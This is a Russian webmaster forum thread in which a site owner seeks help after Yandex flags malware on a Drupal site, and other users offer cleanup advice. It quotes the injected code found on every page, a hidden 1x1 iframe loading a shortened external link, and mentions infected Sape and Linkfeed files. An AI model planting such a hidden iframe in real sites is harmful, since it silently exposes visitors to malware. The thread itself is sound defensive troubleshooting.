- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте, пришел сегодня домой, проверяю почту и тут Яшка пишет что на сайте вредноносный код итд, у меня ВПС, найден только на одном сайте, в панельке смотрю ( Яшка пишет что на главной странице и еще на одной созданной год где-то назад)
1) на зараженном сайте првоерил фаил page.tpl ( сайт на Друпал ) фаил весит 13 клб, а в резервной копии 10,3 клб, вообщем заменил по ФТП
2) как првоерить сайт на вирусы, сайт временно убрали с ЯК.
Кто сталкивался?
проблема известная. В 99,9% случаях вирус будет на всех страницах сайта, так что его можно увидеть открыв исходный код HTML.
вам нужно понять как вирус попал на сайт
- по ФТП - угнали пароль
- или уязвимость скриптов. В большинстве случаем проявляется в различных доп модулях
Это можно понять
- проанализировав логи ФТП и ВЕб сервера.
или
- сменить ФТП пароль, если не помогло то: chown root | chmod 0666 - для всех файлов и chmod 0755 - для всех директорий сайта
на диры куда движок что-то пишет нужно отставить 0777 и закрыть их в конфиге апача
если не помогло то предположу что на ваш сайт был залит шел и злоумышленник снова разместит вирус - это шел нужно найти и удалить
Clamav и ручной просмотр файлов.
на http://webmaster.yandex.ru/ есть кнопочка для повторной перепроверки.
это не значит, что перепроверка произойдет прямо сразу.
Старнный код на всех страницах появился:
<iframe src="http://bit.ly/djfY76" frameborder="off" height="1" width="1"></iframe>
Это червь? сайт первый раз такой вижу ( я имею ввиду в коде)
И забугорный онлайн сервис по проверки сайта на вирусы дает: contains a suspicious IFRAME
ОЧень прощу помощи.
нормальный iframe ..так вири и вешаются..
ещё бывает javascript с функцией eval()
В общем удаляй эту строчку и изучай логи.. кто когда где и как...
Можеш в личку сайтик черкануть.. постараюсь помочь.
CrimeaLand, обязательно данные для входа в панель управления, фтп поменять. Обычно так залазят и фреймы вешают насколько я знаю.
CrimeaLand, обязательно данные для входа в панель управления, фтп поменять. Обычно так залазят и фреймы вешают насколько я знаю.
Это уже сделал, нажил странную строчку и фаили Линкфида, удалил, но все равно Авира пищит...
CrimeaLand
сравните резервную копию с тем что на сервере например в Total Commander -> Инструменты -> Синхронизировать каталоги -> Сравнить. Все файлы на сервере которые различаются с бекапом и проанализируйте код этих файлов. Клик мышкой в отчете откроет "сравнение содержимого файла"
А на будущее: монтируйте в директорию, где файлы сайта другой слайс в режиме readonly и все проблемы кончены.
А на будущее: монтируйте в директорию, где файлы сайта другой слайс в режиме readonly и все проблемы кончены.
А можно подобнее?
CrimeaLand добавил 23.07.2010 в 14:21
Кому интересно, вирус был в фаилах Sape.php и linfeed.php удалил строки ив се гуд!